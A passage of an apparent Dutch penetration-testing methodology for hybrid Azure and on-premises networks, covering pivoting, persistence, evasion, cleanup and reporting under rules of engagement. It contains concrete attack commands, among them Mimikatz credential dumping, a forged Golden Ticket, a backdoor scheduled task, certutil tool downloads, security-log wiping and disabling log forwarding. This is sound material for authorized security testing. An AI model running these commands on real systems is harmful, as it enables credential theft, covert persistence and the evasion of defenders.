    • [ ] [RoE Check] Her-draai enumeratie scans vanaf nieuw gecompromitteerde hosts.

      • Voorbeeld: Vanaf gecompromitteerde Server A (die route heeft naar ander subnet), draai nmap -sT 192.168.50.0/24 om hosts te vinden in voorheen onscanbaar netwerk.

  • Azure PowerShell Voorbeeld (Informatief):

Stap 5.3: [HYBRIDE PIVOT] Pivoteren Tussen Azure & Intern

  • [ ] Uitleg: Gebruik actief verkregen toegang in de ene omgeving om toegang te krijgen of privileges te escaleren in de andere.

  • [ ] Checklist & Voorbeelden:

    • [ ] [HYBRIDE PIVOT] Azure -> Intern:

      • [ ] Gebruik Invoke-AzVMRunCommand op Arc/Hybrid Workers.

        • Voorbeeld: Verkrijg Contributor op Arc machine APP01-Arc. Gebruik Invoke-AzVMRunCommand om Mimikatz (privilege::debug, sekurlsa::logonpasswords) direct uit te voeren op de interne APP01 server via Arc agent.

      • [ ] RDP/SSH/WinRM van gecontroleerde Azure VM naar interne netwerk.

        • Voorbeeld: RDP naar Azure VM JumpBox01 die VPN connectie actief heeft. Vanaf JumpBox01, RDP naar interne DC 10.50.1.10.

      • [ ] Krijg toegang tot interne web apps via Azure Application Proxy.

        • Voorbeeld: Compromitteer SP gebruikt voor App Proxy. Gebruik SP creds om potentieel direct te interacteren met connector of interne applicatie indien onveilig geconfigureerd.

      • [ ] Exploit interne services toegankelijk via Azure Private Endpoints.

        • Voorbeeld: Azure Function App heeft Private Endpoint naar interne SQL DB 10.50.1.20. Compromitteer Function App, maak gebruik van zijn netwerkpad om te verbinden met interne DB.

    • [ ] [HYBRIDE PIVOT] Intern -> Azure:

      • [ ] Dump creds/tokens van AAD Connect / ADFS servers.

        • Voorbeeld: Compromitteer AAD Connect server. Dump LSASS geheugen -> vind creds voor MSOL_SyncAccount. Gebruik deze potentieel krachtige creds via Connect-MgGraph -Credential. Of gebruik ADFSDump tool indien ADFS gecompromitteerd.

      • [ ] Dump browser cookies/tokens/opgeslagen creds.

        • Voorbeeld: Gebruik LaZagne/Mimikatz dpapi::chrome op gecompromitteerde interne ontwikkelaarsmachine -> vind opgeslagen cookies voor portal.azure.com. Replay cookie in browser om toegang te krijgen tot portal.

      • [ ] Indien Domain Admin verkregen, manipuleer gesynchroniseerde attributen/groepen.

        • Voorbeeld: Als DA intern, voeg gecompromitteerd gebruikersaccount toe aan een groep Azure_Global_Admins_Synced die synchroniseert naar AAD en GA rol toegewezen krijgt. Wacht op AAD Connect sync cyclus.

      • [ ] Man-in-the-Middle ADFS verkeer.

        • Voorbeeld: Indien netwerkpositie het toelaat (bv. ARP spoofing op ADFS server segment - zeer luidruchtig/riskant), onderschep SAML tokens. Vereist specifieke tooling en netwerk setup.

  • Azure PowerShell Voorbeeld (Verkrijg AAD Connect Sync Account Info - Vereist Privs):

Stap 5.4: [DOELSTELLING] Bereiken van Missie Doelstellingen

  • [ ] Uitleg: Focus verkregen toegang op het bereiken van specifieke doelen uit RoE.

  • [ ] Checklist & Voorbeelden:

    • [ ] Navigeer door netwerken/systemen naar doel resource(s).

      • Voorbeeld: Doel is Klant A database. Lateraal bewegen via RDP intern naar SQLSERVER-A.

    • [ ] Extraheer doeldata.

      • Voorbeeld: Voer SQL query SELECT * FROM CustomerPII uit op SQLSERVER-A. Kopieer resultaten. Exfiltreer data via vastgesteld C2 kanaal of Azure file share.

    • [ ] Voer doelactie uit als bewijs.

      • Voorbeeld: Doel om controle over Klant B's key app te demonstreren. Gebruik gecompromitteerde Azure creds met Contributor rol om de Web App ClientB-WebApp te stoppen met Stop-AzWebApp.

    • [ ] [RoE Check] [POST-DA/GA] Demonstreer DA/GA impact (Golden Ticket, DCSync, etc.).

      • Voorbeeld: Na interne DA + krbtgt hash verkregen: Op Kali, gebruik Mimikatz of ticketer.py om Kerberos Golden Ticket te smeden voor Administrator gebruiker. Gebruik ticket om toegang te krijgen tot elke resource in domein (psexec.py -k ...). Indien Azure GA, demonstreer door nieuwe testgebruiker met GA rol aan te maken. Vereist Expliciete RoE Goedkeuring.

  • Azure PowerShell Voorbeeld (Toegang tot Key Vault Secret - Demonstreren Doelstelling):

Fase 6: Persistentie & Ontwijkingsanalyse

Doel: Vestig footholds om toegang over tijd te behouden (alleen indien expliciet toegestaan voor demonstratie door RoE), of primair analyseer en documenteer potentiële persistentie mechanismen die een aanvaller zou kunnen gebruiken in zowel Azure als interne omgevingen. Overweeg hoe aanvallers detectie zouden kunnen ontwijken.

Stap 6.1: [LAGE-IMPACT AZURE] / [HOGE-IMPACT AZURE] Azure Persistentie Analyse/POC

  • [ ] Uitleg: Identificeer of, indien toegestaan, implementeer manieren om Azure toegang te behouden. POC vereist RoE.

  • [ ] Checklist & Voorbeelden:

    • [ ] (Analyse/POC) Voeg credentials toe aan Service Principals/Apps.

      • Voorbeeld (POC):

        Opschonen Vereist.

    • [ ] (Analyse/POC) Creëer nieuwe geprivilegieerde Gebruiker/Gast.

      • Voorbeeld (POC):

        Opschonen Vereist.

    • [ ] (Analyse/POC) Wijzig PIM voor permanente eligibiliteit/toewijzing.

      • Voorbeeld (Analyse): Beoordeel PIM rol instellingen via Azure Portal/Graph - zoek naar rollen zonder activatie vereisten of lange maximale activatie duren. POC vereist Graph PIM schrijf scopes.

    • [ ] (Analyse) Kwaadaardige Federatie wijzigingen.

      • Voorbeeld (Analyse): Aanvaller met Global Admin voegt eigen SAML IdP toe via New-MgDomainFederationConfiguration, waardoor ze AAD auth kunnen omzeilen.

    • [ ] (Analyse/POC) Automation Account schedules/webhooks.

      • Voorbeeld (POC):

        Opschonen Vereist.

    • [ ] (Analyse/POC) Deploy backdoor via Web App/Function/VM Extension.

      • Voorbeeld (POC):

        Opschonen Vereist.

  • Azure PowerShell Voorbeeld (Creëer Geplande Runbook - POC Vereist RoE):

Stap 6.2: [HOGE-IMPACT INTERN] Interne Persistentie Analyse/POC (Vereist Interne Foothold & Expliciete RoE)

  • [ ] Uitleg: Identificeer of, indien toegestaan, implementeer manieren om interne toegang te behouden. Implementatie is hoog-risico.

  • [ ] Checklist & Voorbeelden:

    • [ ] (Analyse/POC [HOGE-IMPACT]) Geplande Taken (schtasks /create), Services (sc create), Registry Run Keys (reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run).

      • Voorbeeld (POC): Op gecompromitteerde host: schtasks /create /tn "Updater" /tr "c:\tools\backdoor.exe" /sc ONLOGON /ru SYSTEM. Opschonen Vereist.

    • [ ] (Analyse/POC [HOGE-IMPACT]) WMI Event Subscriptions.

      • Voorbeeld (Analyse): Gebruik PowerShell Register-WmiEvent of SharpWMI om filter/consumer paar aan te maken dat payload uitvoert op specifieke event (bv. logon).

    • [ ] (Analyse/POC [POST-DA]) Golden/Silver Tickets, DCSync rechten, DSRM misbruik, AdminSDHolder.

      • Voorbeeld (POC - Golden Ticket): Gebruik Mimikatz op DA-gecompromitteerde host: kerberos::golden /user:Administrator /domain:internal.corp /sid:<DomainSID> /krbtgt:<KRBTGT_HASH> /ptt. Gebruik dit ticket om toegang te krijgen tot elke machine. Geen directe opschoning mogelijk behalve KRBTGT wachtwoord reset (zeer disruptief).

  • Azure PowerShell Voorbeeld (Informatief): N.v.t. - Vereist interne host commando's.

Stap 6.3: [HYBRIDE PIVOT] Ontwijkingsoverwegingen Analyse

  • [ ] Uitleg: Analyseer hoe aanvaller detectie door EDR, NDR, SIEM, en Azure monitoring zou kunnen vermijden.

  • [ ] Checklist & Voorbeelden:

    • [ ] MFA Bypass technieken.

      • Voorbeeld (Analyse): Aanvaller gebruikt token gestolen via AiTM phishing; Aanvaller registreert eigen apparaat via zwak MFA registratiebeleid.

    • [ ] Living off the Land (LotL).

      • Voorbeeld (Analyse): Aanvaller gebruikt certutil -urlcache -split -f <URL> file.exe om tools te downloaden; Gebruikt PowerShell remoting voor laterale beweging ipv implants. Gebruikt Azure runCommand voor executie.

    • [ ] Log manipulatie/uitschakeling.

      • Voorbeeld (Analyse): Aanvaller wijzigt Azure Diagnostic Settings (Set-AzDiagnosticSetting) om verzenden van logs naar SIEM te stoppen; Gebruikt wevtutil cl Security op interne host (vereist hoge privileges).

    • [ ] Verbergen van netwerkverkeer.

      • Voorbeeld (Analyse): C2 verkeer getunneld over DNS of HTTPS; Maakt gebruik van Azure Private Link om te communiceren met PaaS services zonder verkeer publiek bloot te stellen.

    • [ ] Interne Ontwijking.

      • Voorbeeld (Analyse): Gebruik van PowerShell AMSI bypass snippets; Gebruik van proces injectie technieken om malware te verbergen in legitieme processen.

  • Azure PowerShell Voorbeeld (Controleer Azure Policy voor Log Forwarding):

Fase 7: Opschonen & Strategische Rapportage (Volledig Beeld)

Doel: Verwijder testartefacten nauwgezet waar mogelijk en veilig (RoE afhankelijk). Lever een uitgebreid rapport dat bevindingen over zowel Azure als interne omgevingen dekt, risico holistisch kwantificeert, uitvoerbare herstelacties biedt voor beide domeinen, en strategische aanbevelingen doet.

Stap 7.1: Actief Opschonen (STERK RoE Afhankelijk)

  • [ ] Uitleg: Verwijder tools, persistentie mechanismen, gecreëerde gebruikers/resources, en draai wijzigingen terug die tijdens de test zijn gemaakt, INDIEN veilig en geautoriseerd. Opschonen kan complex en riskant zijn. Documenteer alles.

  • [ ] Checklist & Voorbeelden:

    • [ ] [RoE Check] Verwijder gecreëerde Azure resources/tags/credentials/role assignments.

      • Voorbeeld:

    • [ ] [RoE Check] [HOGE-IMPACT] Probeer interne persistentie te verwijderen.

      • Voorbeeld: Draai schtasks /delete /tn "Updater" /f. Draai sc delete BadService. Verwijder registry keys met reg delete.

    • [ ] [RoE Check] [HOGE-IMPACT] Verwijder geüploade tools/payloads van interne systemen.

      • Voorbeeld: del c:\temp\nc.exe, rm /tmp/linpeas.sh.

    • [ ] Wis commando geschiedenis waar gepast/mogelijk.

      • Voorbeeld: Draai Clear-History in PowerShell; verwijder .bash_history op Linux host.

    • [ ] Documenteer alle opschoonacties en eventuele bekende restanten/onomkeerbare wijzigingen.

      • Voorbeeld: Rapport Appendix D: "RG 'PentestPOC_RG...' verwijderd. Geplande taak 'Updater' verwijderd. Kon verwijdering van geheugen artefacten van Mimikatz executie niet verifiëren."

  • Azure PowerShell Voorbeeld (Verwijder Resource Group Gemaakt Tijdens Test):

Stap 7.2: Uitgebreide Strategische Rapportage

  • [ ] Uitleg: Creëer een gedetailleerd rapport dat het volledige verhaal van de beoordeling over beide omgevingen vertelt, focust op business impact en uitvoerbare aanbevelingen.

  • [ ] Checklist & Voorbeelden (Rapport Secties):

    • [ ] Managementsamenvatting (Kernrisico's, business impact, samenvatting bevindingen).

      • Voorbeeld: "Bevinding MSP-01 (Gecompromitteerd intern service account gesynchroniseerd naar Azure met Global Admin privileges) presenteert kritiek risico dat volledige tenant compromittering toestaat..."

    • [ ] Scope & Doelstellingen (Duidelijk gedefinieerde Azure + Interne scope, RoE highlights).

      • Voorbeeld: "Scope omvatte Tenant XYZ, Sub ABC, Interne reeks 10.x.x.x. High-impact testen goedgekeurd per RoE Appendix C."

    • [ ] Methodologie (Gedetailleerde Azure + Interne technieken gebruikt, differentieer low/high impact).

      • Voorbeeld: "Fase 2 gebruikte Azure PowerShell voor RBAC enumeratie en Nmap/BloodHound voor interne AD analyse. Fase 3 omvatte Kerberoasting pogingen..."

    • [ ] Bevindingen: Gedetailleerde items voor elke vuln/misconfig (Azure/Intern), Bewijs (screenshots, logs), Risico Rating (CVSS + Scope factor), Uitvoerbare Herstelacties (PoSh voor Azure, GPO/Config voor Intern).

      • Voorbeeld Bevinding (Hybride): "HYB-03: Onveilige VNet Peering staat Azure Dev VM toegang toe tot Interne DC SMB. Risico: Kritiek. Bewijs: Nmap scan van Azure VM 172.16.1.5 naar Interne DC 10.50.1.10 poort 445 succesvol. Herstel: Pas NSG regel toe op DC subnet die SMB weigert van Dev VNet adresruimte."

    • [ ] Aanval Narratief(ven) + Diagrammen.

      • Voorbeeld: Stroomdiagram dat initiele phish -> interne werkstation compromittering -> Mimikatz -> laterale beweging -> AAD Connect server compromittering -> sync account cred diefstal -> Azure GA compromittering -> Lighthouse pivot naar client tenant toont.

    • [ ] Strategische Aanbevelingen: Holistisch advies (Identiteitshygiëne - PAW/Tiering, AAD Connect hardening, Netwerksegmentatie over omgevingen heen, Zero Trust principes, Monitoring/Detectie - Defender suite/Sentinel).

      • Voorbeeld: "Implementeer Tiered Access Model (PAW) voor AD en Azure. Verhard AAD Connect server beveiliging. Schakel PIM in & handhaaf voor alle geprivilegieerde rollen. Vereis phishing-resistente MFA."

    • [ ] Opschoonacties Log.

      • Voorbeeld: Tabel die elk gecreëerd/gewijzigd artefact lijst en bevestiging van verwijdering/terugdraai status.

  • Azure PowerShell Voorbeeld (Informatief - Verzamel Azure AD Sign-in Log info voor rapport):

Stap 7.3: Debrief & Kennisoverdracht

  • [ ] Uitleg: Presenteer bevindingen duidelijk aan zowel technische staf als management bij de MSP en relevante klanten. Leg de risico's en herstelacties effectief uit.

  • [ ] Checklist & Voorbeelden:

    • [ ] Plan debrief meeting(en).

      • Voorbeeld: Kalenderuitnodigingen verstuurd naar MSP IT Security team en Klant A contact voor aparte technische debriefs. Executive summary meeting gepland met MSP leiderschap.

    • [ ] Bereid presentatie slides voor.

      • Voorbeeld: PowerPoint deck inclusief overzicht, kernbevindingen, aanvalspad diagrammen, herstelprioriteiten, strategische thema's.

    • [ ] Wees voorbereid om technische vragen te beantwoorden.

      • Voorbeeld: Wees klaar om uit te leggen hoe de ADCS exploit werkte of waarom de specifieke NSG regel onvoldoende is.

    • [ ] Zorg voor duidelijke overdracht van het rapport en scripts.

      • Voorbeeld: Definitief rapport PDF en ZIP-bestand met informatieve/herstel PowerShell snippets aangeleverd via beveiligde transfer link.

  • Azure PowerShell Voorbeeld (N/A - Communicatie Stap)

Azure PowerShell Automatiseringsscripts

Deze scripts automatiseren ENUMERATIE en ANALYSE stappen waar mogelijk. HOGE-IMPACT acties (Exploitatie, Credential Dumping, Actieve Persistentie, Opschonen van Interne Systemen) MOGEN NIET volledig geautomatiseerd worden en vereisen handmatige uitvoering met zorgvuldig oordeel gebaseerd op de RoE. Gebruik deze scripts als hulpmiddelen, niet als autonome aanvalsplatformen.

PreviousAzure Pentest zonder VM's

Last updated